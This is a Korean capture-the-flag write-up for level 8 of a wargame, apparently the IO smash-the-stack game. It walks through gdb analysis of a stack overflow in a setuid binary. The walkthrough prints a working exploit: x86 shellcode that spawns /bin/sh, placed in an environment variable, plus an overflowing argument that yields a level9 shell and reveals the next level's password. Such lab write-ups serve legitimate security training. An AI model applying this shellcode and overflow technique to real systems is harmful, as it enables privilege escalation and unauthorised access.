Level 8 문제 소스는 아래와 같다.
우선 gdb를 이용하여 디버깅을 해보도록 하자.
level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) disassemble main
Dump of assembler code for function main:
0x08048400 <main+0>: lea 0x4(%esp),%ecx
0x08048404 <main+4>: and $0xfffffff0,%esp
0x08048407 <main+7>: pushl -0x4(%ecx)
0x0804840a <main+10>: push %ebp
0x0804840b <main+11>: mov %esp,%ebp
0x0804840d <main+13>: push %ecx
0x0804840e <main+14>: sub $0x4,%esp
0x08048411 <main+17>: mov 0x4(%ecx),%eax
0x08048414 <main+20>: mov %eax,(%esp)
0x08048417 <main+23>: call 0x8048394 <do_the_nasty>
0x0804841c <main+28>: mov $0x0,%eax
0x08048421 <main+33>: add $0x4,%esp
0x08048424 <main+36>: pop %ecx
0x08048425 <main+37>: pop %ebp
0x08048426 <main+38>: lea -0x4(%ecx),%esp
0x08048429 <main+41>: ret
End of assembler dump.
(gdb) b do_the_nasty
Breakpoint 1 at 0x8048398
(gdb) r `python -c "print 'A'*32 + ' ' + 'B'*10"`
Starting program: /levels/level08 `python -c "print 'A'*32 + ' ' + 'B'*10"`
Breakpoint 1, 0x08048398 in do_the_nasty ()
(gdb) n
Single stepping until exit from function do_the_nasty,
which has no line number information.
0x0804841c in main ()
(gdb) x/32wx $esp
0xbfffdc70: 0xbfffdd14 0xbfffdc90 0xbfffdce8 0x42536455
0xbfffdc80: 0x42424242 0x42424242 0xbfff0042 0x00536455
0xbfffdc90: 0x00000003 0xbfffdd14 0xbfffdd24 0x006e4b18
0xbfffdca0: 0x00000001 0x00000001 0x00000000 0x0804820d
0xbfffdcb0: 0x00659ff4 0x08048480 0x080482f0 0xbfffdce8
0xbfffdcc0: 0xebb92081 0xb2c835fe 0x00000000 0x00000000
0xbfffdcd0: 0x00000000 0x00da02e0 0x0053637d 0x00da7ff4
0xbfffdce0: 0x00000003 0x080482f0 0x00000000 0x08048311
(gdb) x/32wx $esp-50
0xbfffdc3e: 0xdc440000 0x4141bfff 0x41414141 0x41414141
0xbfffdc4e: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdc5e: 0x41414141 0x82f04141 0xdc780804 0x841cbfff
0xbfffdc6e: 0xdd140804 0xdc90bfff 0xdce8bfff 0x6455bfff
0xbfffdc7e: 0x42424253 0x42424242 0x00424242 0x6455bfff
0xbfffdc8e: 0x00030053 0xdd140000 0xdd24bfff 0x4b18bfff
0xbfffdc9e: 0x0001006e 0x00010000 0x00000000 0x820d0000
0xbfffdcae: 0x9ff40804 0x84800065 0x82f00804 0xdce80804
(gdb) x/32wx $esp-48
0xbfffdc40: 0xbfffdc44 0x41414141 0x41414141 0x41414141
0xbfffdc50: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdc60: 0x41414141 0x080482f0 0xbfffdc78 0x0804841c
0xbfffdc70: 0xbfffdd14 0xbfffdc90 0xbfffdce8 0x42536455
0xbfffdc80: 0x42424242 0x42424242 0xbfff0042 0x00536455
0xbfffdc90: 0x00000003 0xbfffdd14 0xbfffdd24 0x006e4b18
0xbfffdca0: 0x00000001 0x00000001 0x00000000 0x0804820d
0xbfffdcb0: 0x00659ff4 0x08048480 0x080482f0 0xbfffdce8
(gdb) x/32wx 0xbfffdc78
0xbfffdc78: 0xbfffdce8 0x42536455 0x42424242 0x42424242
0xbfffdc88: 0xbfff0042 0x00536455 0x00000003 0xbfffdd14
0xbfffdc98: 0xbfffdd24 0x006e4b18 0x00000001 0x00000001
0xbfffdca8: 0x00000000 0x0804820d 0x00659ff4 0x08048480
0xbfffdcb8: 0x080482f0 0xbfffdce8 0xebb92081 0xb2c835fe
0xbfffdcc8: 0x00000000 0x00000000 0x00000000 0x00da02e0
0xbfffdcd8: 0x0053637d 0x00da7ff4 0x00000003 0x080482f0
0xbfffdce8: 0x00000000 0x08048311 0x08048400 0x00000003
(gdb) x/32wx 0xbfffdce8
0xbfffdce8: 0x00000000 0x08048311 0x08048400 0x00000003
0xbfffdcf8: 0xbfffdd14 0x08048480 0x08048430 0x00d9b250
0xbfffdd08: 0xbfffdd0c 0x00da5ae5 0x00000003 0xbfffddf7
0xbfffdd18: 0xbfffde07 0xbfffde28 0x00000000 0xbfffde33
0xbfffdd28: 0xbfffdec0 0xbfffded0 0xbfffdedb 0xbfffdefd
0xbfffdd38: 0xbfffdf10 0xbfffdf1c 0xbfffdf28 0xbfffdf55
0xbfffdd48: 0xbfffdf6b 0xbfffdf7a 0xbfffdf87 0xbfffdf90
0xbfffdd58: 0xbfffdfa2 0xbfffdfaa 0xbfffdfb9 0x00000000
(gdb) q
The program is running. Exit anyway? (y or n) y
level8@io:/tmp/by8$
위의 결과를 보면 argv[2]에 더 긴 값을 주면 실행 흐름을 바꿀 수 있을 것으로 보인다. 다시 한번 시도해 보자.
level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) disassemble main
Dump of assembler code for function main:
0x08048400 <main+0>: lea 0x4(%esp),%ecx
0x08048404 <main+4>: and $0xfffffff0,%esp
0x08048407 <main+7>: pushl -0x4(%ecx)
0x0804840a <main+10>: push %ebp
0x0804840b <main+11>: mov %esp,%ebp
0x0804840d <main+13>: push %ecx
0x0804840e <main+14>: sub $0x4,%esp
0x08048411 <main+17>: mov 0x4(%ecx),%eax
0x08048414 <main+20>: mov %eax,(%esp)
0x08048417 <main+23>: call 0x8048394 <do_the_nasty>
0x0804841c <main+28>: mov $0x0,%eax
0x08048421 <main+33>: add $0x4,%esp
0x08048424 <main+36>: pop %ecx
0x08048425 <main+37>: pop %ebp
0x08048426 <main+38>: lea -0x4(%ecx),%esp
0x08048429 <main+41>: ret
End of assembler dump.
(gdb) b do_the_nasty
Breakpoint 1 at 0x8048398
(gdb) r `python -c "print 'A'*32 + ' ' + 'B'*200"`
Starting program: /levels/level08 `python -c "print 'A'*32 + ' ' + 'B'*200"`
Breakpoint 1, 0x08048398 in do_the_nasty ()
(gdb) n
Single stepping until exit from function do_the_nasty,
which has no line number information.
0x0804841c in main ()
(gdb) x/32wx $esp
0xbfffdbb0: 0xbfffdc54 0xbfffdbd0 0xbfffdc28 0x423e0455
0xbfffdbc0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbd0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbe0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbf0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc00: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc10: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc20: 0x42424242 0x42424242 0x42424242 0x42424242
(gdb) x/32wx $esp-50
0xbfffdb7e: 0xdb840000 0x4141bfff 0x41414141 0x41414141
0xbfffdb8e: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdb9e: 0x41414141 0x82f04141 0xdbb80804 0x841cbfff
0xbfffdbae: 0xdc540804 0xdbd0bfff 0xdc28bfff 0x0455bfff
0xbfffdbbe: 0x4242423e 0x42424242 0x42424242 0x42424242
0xbfffdbce: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbde: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbee: 0x42424242 0x42424242 0x42424242 0x42424242
(gdb) x/32wx $esp-48
0xbfffdb80: 0xbfffdb84 0x41414141 0x41414141 0x41414141
0xbfffdb90: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdba0: 0x41414141 0x080482f0 0xbfffdbb8 0x0804841c
0xbfffdbb0: 0xbfffdc54 0xbfffdbd0 0xbfffdc28 0x423e0455
0xbfffdbc0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbd0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbe0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbf0: 0x42424242 0x42424242 0x42424242 0x42424242
(gdb) x/32wx 0xbfffdbb8
0xbfffdbb8: 0xbfffdc28 0x423e0455 0x42424242 0x42424242
0xbfffdbc8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbd8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbe8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdbf8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc08: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc18: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc28: 0x42424242 0x42424242 0x42424242 0x42424242
(gdb) x/32wx 0xbfffdc28
0xbfffdc28: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc38: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc48: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc58: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc68: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffdc78: 0x42424242 0x42424242 0x42424242 0x00424242
0xbfffdc88: 0xbfffdf6b 0xbfffdf7a 0xbfffdf87 0xbfffdf90
0xbfffdc98: 0xbfffdfa2 0xbfffdfaa 0xbfffdfb9 0x00000000
(gdb)
원하는 대로 실행 흐름이 넘어온 것을 확인할 수 있었다. 따라서 [A*32] + [SHELLCODE 주소*200] 형태로 공격을 시도해 보자.
level8@io:/tmp/by8$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) b main
Breakpoint 1 at 0x804840e
(gdb) r
Starting program: /levels/level08
Breakpoint 1, 0x0804840e in main ()
(gdb) x/32wx $esp
0xbfffdca4: 0xbfffdcc0 0xbfffdd18 0x00126455 0x08048480
0xbfffdcb4: 0x080482f0 0xbfffdd18 0x00126455 0x00000001
0xbfffdcc4: 0xbfffdd44 0xbfffdd4c 0x005c7b18 0x00000001
0xbfffdcd4: 0x00000001 0x00000000 0x0804820d 0x00249ff4
0xbfffdce4: 0x08048480 0x080482f0 0xbfffdd18 0xebb98081
0xbfffdcf4: 0x30c835fe 0x00000000 0x00000000 0x00000000
0xbfffdd04: 0x00d0d2e0 0x0012637d 0x00d14ff4 0x00000001
0xbfffdd14: 0x080482f0 0x00000000 0x08048311 0x08048400
(gdb)
0xbfffdd24: 0x00000001 0xbfffdd44 0x08048480 0x08048430
0xbfffdd34: 0x00d08250 0xbfffdd3c 0x00d12ae5 0x00000001
0xbfffdd44: 0xbfffde23 0x00000000 0xbfffde33 0xbfffdec0
0xbfffdd54: 0xbfffded0 0xbfffdedb 0xbfffdefd 0xbfffdf10
0xbfffdd64: 0xbfffdf1c 0xbfffdf28 0xbfffdf55 0xbfffdf6b
0xbfffdd74: 0xbfffdf7a 0xbfffdf87 0xbfffdf90 0xbfffdfa2
0xbfffdd84: 0xbfffdfaa 0xbfffdfb9 0x00000000 0x00000010
0xbfffdd94: 0xbfebfbff 0x00000006 0x00001000 0x00000011
(gdb)
0xbfffdda4: 0x00000064 0x00000003 0x08048034 0x00000004
0xbfffddb4: 0x00000020 0x00000005 0x00000007 0x00000007
0xbfffddc4: 0x00cfa000 0x00000008 0x00000000 0x00000009
0xbfffddd4: 0x080482f0 0x0000000b 0x000003f0 0x0000000c
0xbfffdde4: 0x000003f0 0x0000000d 0x000003f0 0x0000000e
0xbfffddf4: 0x000003f0 0x00000017 0x00000000 0x0000000f
0xbfffde04: 0xbfffde1b 0x00000000 0x00000000 0x00000000
0xbfffde14: 0x00000000 0x69000000 0x00363836 0x2f000000
(gdb)
0xbfffde24: 0x6576656c 0x6c2f736c 0x6c657665 0x53003830
0xbfffde34: 0x4c4c4548 0x45444f43 0x9090903d 0x90909090
0xbfffde44: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde54: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde64: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde74: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde84: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde94: 0x90909090 0x90909090 0x90909090 0x58176a90
(gdb) q
The program is running. Exit anyway? (y or n) y
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\x94\xde\xff\xbf'*200"`
Segmentation fault
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\xff\xbf\x94\xde'*200"`
Segmentation fault
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\xbf\x94\xde\xff'*200"`
sh-3.2$ id
uid=1008(level8) gid=1008(level8) euid=1009(level9) groups=1008(level8),1029(nosu)
sh-3.2$ cat /home/level9/.pass
ynfbxd6t
sh-3.2$
쉘코드를 환경변수에 넣었기 때문에 그 주소가 실행 환경에 따라 조금씩 달라지므로, 주소 값을 조금씩 바꾸어 가며 시도하다 보면 주소가 맞아 떨어진다.